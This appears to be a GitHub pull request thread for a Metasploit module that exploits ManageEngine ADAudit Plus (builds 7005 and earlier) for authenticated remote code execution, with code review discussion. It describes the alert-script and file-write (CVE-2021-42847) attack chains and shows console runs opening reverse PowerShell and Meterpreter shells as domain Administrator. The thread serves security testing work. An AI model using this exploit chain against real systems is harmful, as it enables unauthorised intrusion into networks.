Add manageengine adaudit plus authenticated rce module and docs
rapid7/metasploit-framework pull request #17133
Opened 2022-10-12 13:45 UTC by ErikWynter

# About
This change adds and exploit module (with docs) to achieve authenticated RCE on ManageEngine ADAudit plus builds 7005 and prior. The module exploits security issues that allow authenticated users to execute arbitrary code by creating a custom alert profile and leveraging the custom alert script component.

The module comprises two different exploit chains:
- For versions prior to build 7004, the payload is directly inserted in the custom alert script component of the alert profile.
- For builds 7004 and 7005, the module leverages an arbitrary file write vulnerability (CVE-2021-42847) to create a Powershell script in the alert_scripts directory that contains the payload. The name of this script is then provided as the value for the custom alert script component of the alert profile.

This module requires valid credentials for an account with the privileges to create alert scripts.
It has been successfully tested against ManageEngine ADAudit Plus builds 7003 and 7005 running on Windows Server 2012 R2.

# Writeup and demo videos
I have published a [writeup](https://medium.com/@erik.wynter/pwning-manageengine-from-endpoint-to-exploit-bc5793836fd) that covers the attacks that this module exploits. You may want to skip sections 4 and 6 since those cover different attacks.

In addition, I have created the following demo videos:
1. [This video](https://vimeo.com/759439559) showing the module in action against ADAudit Plus build 7003
2. [This video](https://vimeo.com/759448477) showing the module in action against ADAudit Plus build 7005

# Vulnerable Application
ManageEngine ADAudit plus builds 7005 and prior.

# Installation Information
Vulnerable versions of ADAudit Plus are available [here](https://archives2.manageengine.com/active-directory-audit/).

After running the installer, you can launch ADAudit Plus by opening Command Prompt with administrator privileges
and then running: `<install_dir>\bin\run.bat`

Versions 7005 and prior are vulnerable by default, so no special configuration is required after installing the application.

The default ADAudit Plus credentials (set as default options for the module) are `admin`:`admin`
# Scenarios
## ManageEngine ADAudit Plus build 7003 running on Windows Server 2012 R2
```
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > options 

Module options (exploit/windows/http/manageengine_adaudit_plus_authenticated_rce):

   Name         Current Setting             Required  Description
   ----         ---------------             --------  -----------
   AUTH_DOMAIN  ADAuditPlus Authentication  yes       ADAudit Plus authentication domain (default is ADAuditPlus Authentication)
   PASSWORD     admin                       yes       Password to authenticate with
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       192.168.91.250              yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT        8081                        yes       The target port (TCP)
   SSL          false                       no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                           yes       The base path to ManageEngine ADAudit Plus
   USERNAME     admin                       yes       Username to authenticate with
   VHOST                                    no        HTTP server virtual host

Payload options (cmd/windows/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LHOST         192.168.91.195   yes       The listen address (an interface may be specified)
   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
   LPORT         4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows Command

msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.91.195:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using configured authentication domain alias LIES.
[*] Trying to authenticate...
[*] Found 1 configured domain(s):
[*] - LIES.local: LIES.local
[+] Successfully authenticated
[+] The target appears to be vulnerable. The target is ADAudit Plus 7003
[*] Attempting to create an alert profile
[+] Successfully created alert profile UiYnupjyi24
[*] Attempting to trigger the payload via an authentication attempt for domain LIES using incorrect credentials.
[*] Trigger attempt completed. Let's hope we get a shell...
[*] Powershell session session 1 opened (192.168.91.195:4444 -> 192.168.91.250:54442) at 2022-10-12 12:09:43 +0300
[*] Powershell session session 2 opened (192.168.91.195:4444 -> 192.168.91.250:54441) at 2022-10-12 12:09:43 +0300
[*] Attempting to delete alert UiYnupjyi24
[+] Successfully deleted alert UiYnupjyi24

PS C:\Program Files\ManageEngine\ADAudit Plus\bin>
```

## ManageEngine ADAudit Plus build 7005 running on Windows Server 2012 R2
```
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.91.195:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using configured authentication domain alias LIES.
[*] Trying to authenticate...
[*] Found 1 configured domain(s):
[*] - LIES.local: LIES.local
[+] Successfully authenticated
[+] The target appears to be vulnerable. The target is ADAudit Plus 7005 and the endpoint for CVE-2021-42847 exists.
[*] Attempting to authenticate again in order to retrieve the required cookies.
[*] Attempting to create an alert profile
[*] Attempting to write the payload to /alert_scripts/mwlhr.ps1
[+] Successfully wrote the payload to /alert_scripts/mwlhr.ps1 in the ManageEngine ADAudit Plus install directory
[+] Successfully created alert profile dVmy0Ygz
[*] Attempting to trigger the payload via an authentication attempt for domain LIES using incorrect credentials.
[*] Trigger attempt completed. Let's hope we get a shell...
[!] Make sure to manually cleanup the mwlhr.ps1 file from /alert_scripts/ in the ManageEngine ADAudit Plus install directory
[*] Powershell session session 1 opened (192.168.91.195:4444 -> 192.168.91.250:41348) at 2022-10-12 12:59:28 +0300
[*] Powershell session session 2 opened (192.168.91.195:4444 -> 192.168.91.250:41347) at 2022-10-12 12:59:28 +0300
[*] Attempting to delete alert profile dVmy0Ygz
[+] Successfully deleted profile alert dVmy0Ygz

PS C:\Program Files\ManageEngine\ADAudit Plus\bin>
```

2022-10-14 19:36 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/http/manageengine_adaudit_plus_authenticated_rce.md
> +## Installation Information
Thought this was meant to be a subsection of vulnerable application section? Could be wrong though.

2022-10-14 19:54 UTC, gwillcox-r7 commented
@ErikWynter Thanks for submitting this module! I'm looking over things but one question I did have is whether the module could be broken up into library components or similar? Its unusual to see a module with 700+ lines of code which makes me think that we may be trying to stuff too much into it at once.

2022-10-14 20:21 UTC, ErikWynter commented
@gwillcox-r7 yeah there's some overlap with https://github.com/rapid7/metasploit-framework/pull/17132 since the code for builds 7004 and 7005 takes advantage of the same arbitrary file write vector and targets the same endpoint, so that would be good to move to a mixin. Apart from that though I think everything here is pretty much unique to this module. For instance the alert profile creation and cleanup covers a lot of lines but I don't really see how to reduce that. I'm always open to suggestions of course :)

2022-10-14 22:53 UTC, gwillcox-r7 requested changes
Overall I like the design of this module, nice work! Just needs a bit of work to fix some issues I discovered during review; seems like most of these likely occurred due to combining of large amounts of code which resulted in some edge cases and potential bad practices.

Will note I wasn't able to get around to reviewing `create_alert_profile` so will hopefully finish that up on Monday but wanted to provide you a chance to review the feedback before then.

2022-10-14 22:53 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      @domain_alias = auth_domain
Your calling auth_domain up to three times here. Would it not be better to save the results and then use that for comparison?

2022-10-14 22:53 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      print_status('Trying to authenticate...')
I'm not sure if this should be moved out of this conditional since your always going to be authenticating with the current code, regardless of the mode.

2022-10-14 22:53 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    alert_id = res1.body.scan(/modelId":(\d+),"name":"#{@alert_name}/)&.flatten&.first
Correct me if I'm wrong but two things here. Firstly should we not be checking that res1.body isn't empty? Secondly, could we not save the scan results so we don't end up doing it twice?

2022-10-14 22:53 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +        'data' => { 'ids' => [alert_id] }.to_json,
By this point `alert_id` could very well be `nil` here and yet you haven't checked for that by this point in your code.

2022-10-14 22:57 UTC, gwillcox-r7 commented
> @gwillcox-r7 yeah there's some overlap with #17132 since the code for builds 7004 and 7005 takes advantage of the same arbitrary file write vector and targets the same endpoint, so that would be good to move to a mixin. It might make sense to create the mixin as part of the other PR since that one shares a lot of code with an existing module that should also be moved to a library. Then this PR would be kept back until the other one lands. What do you think? In any case I'm happy to work on the mixin myself.
> 
> This will probably still end up being a sizeable module though. For instance the alert profile creation and cleanup covers a lot of lines but I don't really see how to reduce that. I'm always open to suggestions of course :)

Happy to proceed however you see fit. The way I see it is inevitably some code from both modules will need to likely form part of a new library, though how that is done is up to you and I'm open to proceeding with your suggestion if you feel that would be better.

2022-10-19 12:07 UTC, ErikWynter commented
@gwillcox-r7 thanks for the review! I'll try and go over this on Friday. I might actually just start working on an ADAudit mixin as part of this PR since this has been reviewed already. then once this has been landed and we move to https://github.com/rapid7/metasploit-framework/pull/17132 I can just do a rebase there and expand on the library.

2022-10-21 14:34 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      'uri' => normalize_uri(target_uri.path, 'adsf', 'js', 'common', 'JumpTo.js'),
lol I get why you noticed this but this is not a typo and cannot be randomized. it's simply part of their directory structure in the web root:
```
06/29/2022  12:58 AM    <DIR>          .
06/29/2022  12:58 AM    <DIR>          ..
06/29/2022  12:58 AM    <DIR>          adsf
06/29/2022  12:58 AM    <DIR>          agent
06/29/2022  12:58 AM    <DIR>          assets
10/05/2021  04:14 PM               331 crossdomain.xml
10/05/2021  04:14 PM    <DIR>          GPODetails
06/29/2022  12:58 AM    <DIR>          html
06/29/2022  12:58 AM    <DIR>          images
10/05/2021  04:14 PM             4,349 index.html
06/29/2022  12:58 AM    <DIR>          jrxml
06/29/2022  12:58 AM    <DIR>          js
06/29/2022  12:58 AM    <DIR>          jsp
06/29/2022  12:58 AM    <DIR>          jspf
10/05/2021  04:14 PM             4,035 respond.min.js
10/05/2021  04:14 PM                51 robots.txt
06/29/2022  12:58 AM    <DIR>          styles
06/29/2022  12:58 AM    <DIR>          WEB-INF
06/29/2022  12:58 AM    <DIR>          web-source
```

2022-10-21 14:48 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +  # this method will return an Array consisting of a return code and either a cookie or a failure message
I looked into this. In the  `authenticate` method `nil` was returned only in the scenario where we are triggering the payload and the response is as expected. no actions were performed on the returned value. However, I do agree that it's somewhat inconsistent so I will change it to an empty string for that scenario. If you still want to change something about this, let me know.

2022-10-21 15:05 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      return [1, nil]
nice catch, I'll fix this in the next commit

2022-10-21 15:06 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    auth_res_code, cookie_or_err_msg = authenticate('silent') # need to add modes for authenticate (regular, trigger or cleanup)
yeah I'll delete this

2022-10-21 15:15 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      print_status('Trying to authenticate...')
true, but I figured that in other scenarios it could be confusing to the user to print that here. I'll check this the next time I test the module again to see what it would look like

2022-10-21 15:22 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    alert_id = res1.body.scan(/modelId":(\d+),"name":"#{@alert_name}/)&.flatten&.first
agreed, fixing this

2022-10-21 15:29 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    res1 = send_request_cgi({
agreed. I've done this everywhere now

2022-10-21 15:30 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      # if we're only here to trigger the payload, we don't need to perform any additional requests / parsing
yup, I edited the comment for clarification

2022-10-28 07:05 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      'method' => 'POST'
verified that this needs to be POST. if you use GET, it will return HTTP response code 400, which make it impossible to know for sure whether or not the endpoint is accessible.

2022-10-28 13:01 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      return [0, nil]
this is handler differently now

2022-10-28 13:02 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      print_status('Trying to authenticate...')
fixed this

2022-10-28 14:03 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +            }
@gwillcox-r7 I have never written a module that used a dropper before, but based on what I see in other modules, I'm afraid it won't work here. I actually tried a few things but I couldn't get it going. A cmdstager doesn't seem feasible either. Basically there are two scenarios:
- For versions 7003 and prior, we don't have a separate file write vector, so I don't think we can use a dropper there. Instead we can pass any valid windows or powershell command to the target. However, this can only be done while creating an alert script. Actually triggering the alert script takes several more steps, including trying to authenticate as a non-existent domain user with incorrect credentials. Therefore this doesn't seem suitable for a cmdstager either.
- For versions 7004 and 7005 we do have a file write vector, but we can only create and execute ps1 scripts. An EXE dropper won't do because the payload has to pass through JSON. While I was able to leverage this for a simple cmd powershell payload (that's how the module currently works), I couldn't get a shell when using powershell meterpreter payloads in this scenario, so there may be additional limitations (I'll add a comment about this in the docs). Apart from this, the attack also relies on creating an alert script and triggering it in the way as described above, so a cmdstager won't work. I'm not sure if there's another way use a meterpreter payload, or any other windows or windows/x64 payload when you're limited to the creation of a powershell script?

2022-10-28 14:13 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +        print_warning("Make sure to manually cleanup the #{@ps1_script_name} file from /alert_scripts/ in the ManageEngine ADAudit Plus install directory")
Yeah for builds 7004 and 7005 the cmd/windows/powershell/meterpreter* payloads didn't work when I tested them. I added a note to the docs about this

2022-10-28 15:01 UTC, ErikWynter commented
@gwillcox-r7 the latest changes include the creation of a mixin containing several methods that could be used by other ADAudit Plus modules in the future. A few of those will be leveraged by https://github.com/rapid7/metasploit-framework/pull/17132 and once this is landed I'll expand on this mixin in the context of that PR. I have tried to address all remaining issues. In the mixin I've tried to be very consistent with return types, as you will (hopefully) see. I've responded to your comment about potentially using a dropper. I tested the module successfully against builds 7003 and 7005 again:
## ADAudit Plus build 7003
```
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.91.195:4004 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using configured authentication domain alias LIES.
[*] Trying to authenticate...
[*] Found 1 configured domain(s): LIES.local
[+] Successfully authenticated
[+] The target appears to be vulnerable. The target is ADAudit Plus 7003
[*] Attempting to create an alert profile
[+] Successfully created alert profile OsDKhLKw2c
[*] Attempting to trigger the payload via an authentication attempt for domain LIES using incorrect credentials.
[*] Trigger attempt completed. Let's hope we get a shell...
[*] Sending stage (200774 bytes) to 192.168.91.199
[*] Sending stage (200774 bytes) to 192.168.91.199
[!] If the client portion of stdapi or priv fails to load, you can do so manually via 'load stdapi' and/or load priv'
[*] Meterpreter session 6 opened (192.168.91.195:4004 -> 192.168.91.199:64401) at 2022-10-28 18:00:12 +0300
[*] Meterpreter session 5 opened (192.168.91.195:4004 -> 192.168.91.199:64400) at 2022-10-28 18:00:12 +0300
[*] Attempting to delete alert profile OsDKhLKw2c
[+] Successfully deleted alert profile OsDKhLKw2c

meterpreter > getuid
Server username: LIES\Administrator
```
## ADAudit Plus build 7005
```
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.91.195:1312 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using configured authentication domain alias LIES.
[*] Trying to authenticate...
[*] Found 1 configured domain(s): LIES.local
[+] Successfully authenticated
[+] The target appears to be vulnerable. The target is ADAudit Plus 7005 and the endpoint for CVE-2021-42847 exists.
[*] Attempting to authenticate again in order to retrieve the required cookies.
[*] Attempting to create an alert profile
[*] Attempting to write the payload to /alert_scripts/fpkwdm.ps1
[+] Successfully wrote the payload to /alert_scripts/fpkwdm.ps1 in the ManageEngine ADAudit Plus install directory
[+] Successfully created alert profile j2v6FZGV
[*] Attempting to trigger the payload via an authentication attempt for domain LIES using incorrect credentials.
[*] Trigger attempt completed. Let's hope we get a shell...
[!] Make sure to manually cleanup the fpkwdm.ps1 file from /alert_scripts/ in the ManageEngine ADAudit Plus install directory
[*] Powershell session session 5 opened (192.168.91.195:1312 -> 192.168.91.199:40179) at 2022-10-28 15:48:33 +0300
[*] Powershell session session 6 opened (192.168.91.195:1312 -> 192.168.91.199:40178) at 2022-10-28 15:48:33 +0300
[*] Attempting to delete alert profile j2v6FZGV
[+] Successfully deleted alert profile j2v6FZGV

PS C:\Program Files\ManageEngine\ADAudit Plus\bin> whoami
lies\administrator
```
Please let me know if you run into any issues while reviewing/testing these changes :)

2022-10-28 15:04 UTC, ErikWynter commented
btw I don't know why the sanity test execution keeps failing. I recently updated my fork and for me it works fine locally, so nut sure what's up

2022-10-28 15:08 UTC, adfoster-r7 commented
We're looking into the failing sanity tests currently - it looks like there might be some flakey infra in our side 👀

2022-11-01 03:34 UTC, gwillcox-r7 commented
@msjenkins-r7 test this please

2022-11-01 17:36 UTC, gwillcox-r7 commented
Going to need to rebase this so that our tests pass, give me a sec to do the rebase.

2022-11-03 10:17 UTC, ErikWynter commented
@gwillcox-r7 thanks for rebasing this. please let  me know if any further changes are required

2022-11-08 18:02 UTC, gwillcox-r7 commented
> @gwillcox-r7 thanks for rebasing this. please let me know if any further changes are required

Thanks sorry for the delay on this had some LDAP research projects I needed to finish off but now those are done so I should be able to focus on this. Will give this another code review and try set up a testing environment. Appreciate all the updates!

2022-11-09 02:37 UTC, gwillcox-r7 requested changes
Not yet reviewed the module but given that the code changes could mean readjusting the module code I thought I'd do it after the libraries have been updated.

2022-11-15 15:16 UTC, gwillcox-r7 commented
@ErikWynter Heyo just checking in, updates are available to work on, let me know if any questions/concerns and I'll be happy to assist 👍

2022-11-16 20:40 UTC, ErikWynter commented
@gwillcox-r7 hey sorry for the delay. I didn't have time so far but I'll try to work on the requested changes tomorrow or Friday.

2022-11-18 19:59 UTC, ErikWynter commented
I just pushed some partial changes for the issues still open. I didn't have time to test these unfortunately but I wanted to make sure to save the progress. I'll try to address the remaining issues and test everything next week

2022-12-02 13:06 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus.rb
> +        module ManageengineAdauditPlus
agreed. had to change the file names for this to work, but this is a lot neater

2022-12-02 13:08 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus.rb
> +          NO_ACCESS = 4
that's a great point. I added `status_codes.rb` for this purpose now. Let me know if that looks okay

2022-12-02 13:09 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus/json_post_data.rb
> +    "#{rand(1..9)}_#{Rex::Text.rand_text_numeric(18)}".downcase + '.xml'
great catch! this was supposed to be alphanumberic. I changed this now

2022-12-02 13:10 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus/login.rb
> +      return [adaudit_plus_status::SUCCESS, '', '']
agreed. I have switched the return type to a hash in the latest commit

2022-12-02 13:10 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus/target_info.rb
> + def adaudit_plus_grab_configured_domains(adapcsrf_cookie, mode)
thanks! added

2022-12-02 13:12 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus/json_post_data.rb
> +    post_data['isGPOData'] = options['isGPOData'] || true
good point, added a check for this

2022-12-02 13:20 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus/login.rb
> +      vprint_status('Trying to authenticate...')
@gwillcox-r7 yes this is on purpose. If the mode is `trigger_payload` here, the user will probably not expect the module to perform another authentication attempt here because we already authenticated before (unfortunately re-authenticating seems necessary because ADAudit Plus is very finicky about cookies). Therefore, I figured that printing this message would be confusing for someone who is only waiting to get a shell. However, if a user want to know exactly where the module is at a given point, they can enable the verbose flag to still see this message. Maybe you could have a look at this when you test the module and get the full output? That will make it easier to see if you think the extra print statement would be out of place or not.

2022-12-02 13:23 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus/json_post_data.rb
> +    "{#{Rex::Text.rand_text_alphanumeric(8)}-#{Rex::Text.rand_text_alphanumeric(4)}-#{Rex::Text.rand_text_alphanumeric(4)}-#{Rex::Text.rand_text_alphanumeric(4)}-#{Rex::Text.rand_text_alphanumeric(12
@gwillcox-r7 I have attempted to address this point in the latest commit by deleting this function and adding a `random_generate` function to `lib/rex/proto/ms_dtyp.rb` that covers this. Let me know if this looks alright

2022-12-02 13:24 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus/target_info.rb
> +    end
yeah this was a bit messy. I've tried to clean it up in the latest commit

2022-12-02 13:24 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus/target_info.rb
> +    [adaudit_plus_status::SUCCESS, '', adapcsrf_cookie.value, configured_domains]
agreed

2022-12-02 14:41 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus/login.rb
> +    if mode == 'trigger_payload'
I fully agree with this actually. I wrote this with the idea that it would be part of the module, but then ended up moving it to the mixin without reevaluating if it still made sense. I have now removed the `mode` parameter and instead added a boolean `silent` parameter that is used to determine which messages should be printed. The `trigger_payload` specific stuff has been moved to the exploit module.

2022-12-02 14:44 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus/target_info.rb
> +    domain_aliases = res_body.scan(/<select id="domainName" name="domainName".*?<option value="(.*?)">/m)&.flatten
@gwillcox-r7 Thanks for calling this out. Upon testing I noticed that this wasn't working as expected at all because it should have always returned both the configured domain and the default `ADAuditPlus Authentication` domain, but because the regex was broken it only ever picked the first one. So if a target would have multiple domains configured, the regex would have missed those. I split this up into two separate regex checks now, using the `&.` safe navigator so that we only have to check is the result is blank once. This way I was able to get the module to correctly identify both the configured domain and the default ADAudit Plus one

2022-12-02 14:50 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus/login.rb
> +      vprint_status('Trying to authenticate...')
actually the `trigger_payload` login has been removed here. instead there is just a `silent` boolean. if the mode is `silent`, then `vprint_status` is used here, otherwise `print_status`

2022-12-02 14:55 UTC, ErikWynter commented
@gwillcox-r7 I think my latest commits address all the issues that were still open. I've also made some adjustments to the exploit module itself to make sure it works with the library after the changes. I look forward to your feedback regarding the module itself. Btw, I think we may have to add `FIRST_ATTEMPT_FAIL`  to the notes for Reliability because I noticed I usually don't get a shell the first time, maybe never actually. So I'm curious to see if this will be the same for you.

2022-12-09 15:27 UTC, gwillcox-r7 commented
@ErikWynter Thanks going to run through this today and give it another review. Sorry for the delay on my end 😞

2022-12-28 22:15 UTC, gwillcox-r7 requested changes

2022-12-28 22:15 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +  # Performs an API call to obtain the configured domains. The adapcsrf cookie obtained from this request is necessary to perform further authenticated actions
This line is too long and should be split across two lines.

2022-12-28 22:15 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +    got_cookie = adapcsrf_cookie && adapcsrf_cookie.value.present? ? true : false
This entire check should be being done much much earlier, particularly given your failiure message states that we couldn't get the required adapcsrf cookie yet we are sending that cookie within the very few lines of the code, yet waiting until here to tell the user about if it failed or not, which feels like a disconnect. Additionally I feel like there is a chance that this gets set during your earlier HTTP request within this method which I think might cause some logistical issues within your code.

Feel free to correct me if I'm wrong here though 👍

2022-12-28 22:15 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +  # @return [Hash] Hash containing keys of type String that are mapped to a status code (Integer), a status message (String), a cookie (String) and/or an Array of configured domains as Strings.
You know what the hash key names are so this description should be updated to mention them in my opinion.

2022-12-29 15:01 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus.rb
> +          NO_ACCESS = 4
Looks great thanks for adding that in!

2022-12-29 15:02 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus/json_post_data.rb
> +    "{#{Rex::Text.rand_text_alphanumeric(8)}-#{Rex::Text.rand_text_alphanumeric(4)}-#{Rex::Text.rand_text_alphanumeric(4)}-#{Rex::Text.rand_text_alphanumeric(4)}-#{Rex::Text.rand_text_alphanumeric(12
@ErikWynter Looks great, and like the implementation area you chose 👍 Resolving this

2022-12-29 15:03 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus/json_post_data.rb
> +    post_data['isGPOData'] = options['isGPOData'] || true
New check looks good, approved!

2022-12-29 15:08 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus/target_info.rb
> +    domain_aliases = res_body.scan(/<select id="domainName" name="domainName".*?<option value="(.*?)">/m)&.flatten
Not sure if this fixes this issue 100%, I'll need to do a double check on this as the two .* regexes in one search looks a little suspicious to me. I do think breaking this across two Regexes helps tremendously though!

2022-12-29 15:10 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus/target_info.rb
> +    end
Looks a lot better, thanks for reworking this!

2022-12-29 15:16 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus/target_info.rb
> +    domain_aliases = res_body.scan(/<select id="domainName" name="domainName".*?<option value="(.*?)">/m)&.flatten
Okay yeah this regex is still broken. This will still work for matching:

```
<select id="domainName" name="domainName" tabindex="89" asdfasdfasdfasdfasdfasdasdfasdfasdfasdfsd asdfasdf asdfasdfasdf> <option value="asdf"><select>asdf</select></option></select>
```

Will match on ` <option value="asdf"><select>asdf` when in reality the `</select>` is really for the second tag we inserted, not for the first which is the one we are interested in. I'm wondering if it would be better to parse this with Nokogiri for XML parsing to offload some of this work?

2022-12-29 15:28 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/http/manageengine_adaudit_plus_authenticated_rce.md
> +in the alert_scripts directory that contains the payload.
Could also just add "in the ADAudit Plus installation directory" to clarify this as you did in your Medium article.

2022-12-29 15:33 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +            }
Alright thanks for documenting these limitations. Given the scenario and limitations mentioned I think the current way you have done things should be fine. Appreciate you investigating this!

2022-12-29 16:22 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      @domain_alias = auth_domain
I guess my point here was that you could save this to a local variable vs making multiple method calls for the same data. However that being said I mistakenly thought this function was more complex than it is so the overhead here would mainly be r.e setting up and tearing down call stacks several times to retrieve the same data.

Up to you though this was more of a performance suggestion and isn't a huge issue.

2022-12-29 16:29 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +        'data' => { 'ids' => [alert_id] }.to_json,
This has since been updated and `alert_id` is now checked to see if it is `nil` prior to this line being executed.

2022-12-29 16:30 UTC, BILLALSOO56N commented
Give me metaspoit Termux commands

On Thu, Dec 29, 2022, 9:03 PM Grant Willcox ***@***.***>
wrote:

> ***@***.**** commented on this pull request.
> ------------------------------
>
> In lib/msf/core/exploit/remote/http/manageengine_adaudit_plus.rb
> <https://github.com/rapid7/metasploit-framework/pull/17133#discussion_r1059000559>
> :
>
> > +          SUCCESS = 0
> +          CONNECTION_FAILED = 1
> +          UNEXPECTED_REPLY = 2
> +          NO_MATCH = 3
> +          NO_ACCESS = 4
>
> Looks great thanks for adding that in!
>
> —
> Reply to this email directly, view it on GitHub
> <https://github.com/rapid7/metasploit-framework/pull/17133#discussion_r1059000559>,
> or unsubscribe
> <https://github.com/notifications/unsubscribe-auth/AXGT5MOMACV2R4VLZVE7QVLWPWR25ANCNFSM6AAAAAARDJ3AO4>
> .
> You are receiving this because you are subscribed to this thread.Message
> ID: ***@***.***>
>

2022-12-29 18:07 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/http/manageengine_adaudit_plus_authenticated_rce.md
> +in the alert_scripts directory that contains the payload.
Will be resolved with next commit.

2022-12-29 18:38 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +  # @return [Array] Array containing a status code (Integer) and status message (String). If the target is ADAudit Plus, the Array also contains the server response
Fixed the YARD issue, hash issue still to consider though.

2022-12-29 19:17 UTC, gwillcox-r7 commented
Sorry had to rebase to pull in fixes for our checks from https://github.com/rapid7/metasploit-framework/pull/17419

2023-01-13 13:52 UTC, ErikWynter commented on documentation/modules/exploit/windows/http/manageengine_adaudit_plus_authenticated_rce.md
> +For versions prior to build 7004, the payload is directly inserted in the custom alert script component of the alert profile.
This was not assigned a CVE because it seems they didn't think it qualified for that. In the [release notes](https://www.manageengine.com/products/active-directory-audit/adaudit-plus-release-notes.html) they say only this: `Security hardening has been performed on custom alert script execution.`

2023-01-13 13:53 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/json_post_data.rb
> +    "#{rand(1..9)}_#{Rex::Text.rand_text_alphanumeric(18)}".downcase + '.xml'
@gwillcox-r7 In the format used by ADAudit it seems to always be 18 chars. So if we would randomize this it would actually  stand out more rather than less since it would no longer match the expected format.

2023-01-13 14:28 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +    if res.code == 200 && res.body.include?('domainFullList') && !silent
@gwillcox-r7 Yeah I get that this is not the best way to go. The use of the `silent` flag here and in `login.rb` was my attempt to overcome a pretty annoying thing about how ADAudit Plus works. The thing is, ADAudit plus is super finicky when it comes to cookies. In particular:
- If you perform an authentication request, you will get a cookie that you can then use to visit the dashboard.
- However, once you are there, you cannot use the same cookie to interact with most of the API endpoints.
- The one exception I found was `api/json/configuredDomainsList` and the only way I was able to get a cookie I could use to interact with other endpoints, is to always send a POST request to `api/json/configuredDomainsList` right after authenticating.
